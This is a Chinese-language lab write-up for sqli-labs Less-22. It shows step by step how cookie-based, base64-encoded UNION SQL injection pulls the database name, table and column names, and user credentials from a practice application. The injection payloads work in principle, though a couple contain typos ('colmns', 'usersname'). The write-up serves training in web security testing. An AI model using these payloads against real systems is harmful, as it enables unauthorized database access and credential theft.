sqli-labs-Less-22

sqli-labs 实验记录

Less-22

这一关与第21关类似,除了同样需要进行base64编码转换以外,还需要修改联合查询语句前的符号,将')改为",才可以进行注入。

第一步:分别输入正确与错误的用户名与密码,查找注入点

结合上一关爆出的数据,在用户与密码栏中分别输入正确与错误的数据:uname=Dumb passwd=12 与passwd=Dumb

结果如图如示:在密码正确的页面返回了Cookie信息,且Cookie返回的信息中uname为base64编码,密码错误的页面只显示登陆失败。因此,我们考虑在Cookie这一点进行联合注入。

第二步:查询服务器中的当前数据库

利用Hackbar插件,在Cookie这一点输入如下数据,并使用base64编码进行转换:

复制代码
" union select 1,2,3 #

结果如图所示:可以看到,Cookie的值经过base64编码,变为了一组字符串,页面在name和password两个地方进行了回显,因此,可以进一步修改上面的数据,后续的数据同样需要进行base64编码:

复制代码
" union select 1,database(),3 #

结果如图所示:在原先数字2的地方回显出当前数据库:security。

第三步:查询指定数据库中的表

继续使用hackbar插件,在Cooike注入点输入字符串:

复制代码
" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3#

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的列

继续使用hackbar插件,在Cooike注入点输入字符串:

复制代码
" union select 1,(select group_concat(column_name) from information_schema.colmns where table_schema='security' and table_name='users'),3 #

查询结果如图所示:数据列共有3个,分别是id,username,password。

第五步:查询指定数据表中的具体信息

继续使用hackbar插件,在Cookie注入点输入字符串:

复制代码
" union select 1,(select concat(usersname,':',password) from security.users limit 0,1),3 #

结果如图所示:查询出一条数据,用户名为Dumb,密码为12。

如果需要继续查找其它数据,只需将"limit 0,1"中的'0',进行相应的修改,如"limit 1,1","limit 2,1"等等。

相关推荐
0xDevNull2 小时前
MySQL数据冷热分离详解
后端·mysql
科技小花2 小时前
数据治理平台架构演进观察:AI原生设计如何重构企业数据管理范式
数据库·重构·架构·数据治理·ai-native·ai原生
一江寒逸2 小时前
零基础从入门到精通MySQL(中篇):进阶篇——吃透多表查询、事务核心与高级特性,搞定复杂业务SQL
数据库·sql·mysql
D4c-lovetrain2 小时前
linux个人心得22 (mysql)
数据库·mysql
阿里小阿希3 小时前
CentOS7 PostgreSQL 9.2 升级到 15 完整教程
数据库·postgresql
荒川之神3 小时前
Oracle 数据仓库雪花模型设计(完整实战方案)
数据库·数据仓库·oracle
做个文艺程序员3 小时前
MySQL安全加固十大硬核操作
数据库·mysql·安全
不吃香菜学java3 小时前
Redis简单应用
数据库·spring boot·tomcat·maven
一个天蝎座 白勺 程序猿3 小时前
Apache IoTDB(15):IoTDB查询写回(INTO子句)深度解析——从语法到实战的ETL全链路指南
数据库·apache·etl·iotdb
不知名的老吴4 小时前
Redis的延迟瓶颈:TCP栈开销无法避免
数据库·redis·缓存